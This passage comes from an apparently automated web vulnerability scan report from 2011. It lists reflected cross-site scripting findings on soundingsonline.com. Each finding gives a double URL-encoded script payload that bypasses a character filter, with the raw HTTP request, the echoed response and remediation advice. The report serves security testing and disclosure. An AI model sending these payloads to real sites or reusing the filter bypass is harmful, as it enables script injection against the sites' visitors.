GET /boat-shop?8086b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ea98ea0c61=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop?8086b"><script>alert(1)</script>2ea98ea0c61=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.869. http://www.soundingsonline.com/boat-shop/know-how [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/know-how

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36fa0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b650f6629c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 36fa0"><script>alert(1)</script>2b650f6629c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/know-how?36fa0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b650f6629c=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/know-how?36fa0"><script>alert(1)</script>2b650f6629c=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.870. http://www.soundingsonline.com/boat-shop/new-boats [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-boats

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3aa39f41117 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 55f54"><script>alert(1)</script>3aa39f41117 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/new-boats?55f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3aa39f41117=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/new-boats?55f54"><script>alert(1)</script>3aa39f41117=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.871. http://www.soundingsonline.com/boat-shop/new-gear [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-gear

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45204%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea0b510e9b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45204"><script>alert(1)</script>a0b510e9b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/new-gear?45204%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea0b510e9b6=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/new-gear?45204"><script>alert(1)</script>a0b510e9b6=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.872. http://www.soundingsonline.com/boat-shop/on-powerboats [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-powerboats

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1935b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e64e63626ef9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1935b"><script>alert(1)</script>64e63626ef9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/on-powerboats?1935b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e64e63626ef9=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/on-powerboats?1935b"><script>alert(1)</script>64e63626ef9=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.873. http://www.soundingsonline.com/boat-shop/on-sailboats [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-sailboats

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c395%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec9f14107a73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9c395"><script>alert(1)</script>c9f14107a73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/on-sailboats?9c395%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec9f14107a73=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/on-sailboats?9c395"><script>alert(1)</script>c9f14107a73=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.874. http://www.soundingsonline.com/boat-shop/q-a-a [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/q-a-a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a4df%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebfc7457ca33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5a4df"><script>alert(1)</script>bfc7457ca33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/q-a-a?5a4df%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebfc7457ca33=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/q-a-a?5a4df"><script>alert(1)</script>bfc7457ca33=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.875. http://www.soundingsonline.com/boat-shop/sea-savvy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/sea-savvy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76c48%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e04a044d541e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 76c48"><script>alert(1)</script>04a044d541e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/sea-savvy?76c48%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e04a044d541e=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/sea-savvy?76c48"><script>alert(1)</script>04a044d541e=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.876. http://www.soundingsonline.com/boat-shop/tech-talk [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/tech-talk

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fde49%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1781c9806e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fde49"><script>alert(1)</script>f1781c9806e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/tech-talk?fde49%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1781c9806e=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/tech-talk?fde49"><script>alert(1)</script>f1781c9806e=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.877. http://www.soundingsonline.com/boat-shop/used-boat-review [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/used-boat-review

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7387%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf6ee365ffe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e7387"><script>alert(1)</script>af6ee365ffe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/used-boat-review?e7387%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf6ee365ffe=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/used-boat-review?e7387"><script>alert(1)</script>af6ee365ffe=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.878. http://www.soundingsonline.com/calendar [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /calendar

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d96a3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebaf5dd54016 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d96a3"><script>alert(1)</script>baf5dd54016 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /calendar?d96a3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebaf5dd54016=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<a href="/calendar?d96a3"><script>alert(1)</script>baf5dd54016=1&amp;start=15" title="2">
...[SNIP]...

4.879. http://www.soundingsonline.com/career-opportunities [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /career-opportunities

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fd36%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb51040a3d63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9fd36"><script>alert(1)</script>b51040a3d63 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /career-opportunities?9fd36%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb51040a3d63=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/career-opportunities?9fd36"><script>alert(1)</script>b51040a3d63=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.880. http://www.soundingsonline.com/columns-blogs [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e172f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e12aae247207 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e172f"><script>alert(1)</script>12aae247207 in the application's response.

